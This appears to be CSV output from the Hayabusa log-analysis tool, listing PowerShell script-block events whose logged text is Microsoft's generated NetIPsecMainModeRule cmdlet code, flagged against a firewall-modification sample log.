[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') 
} if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 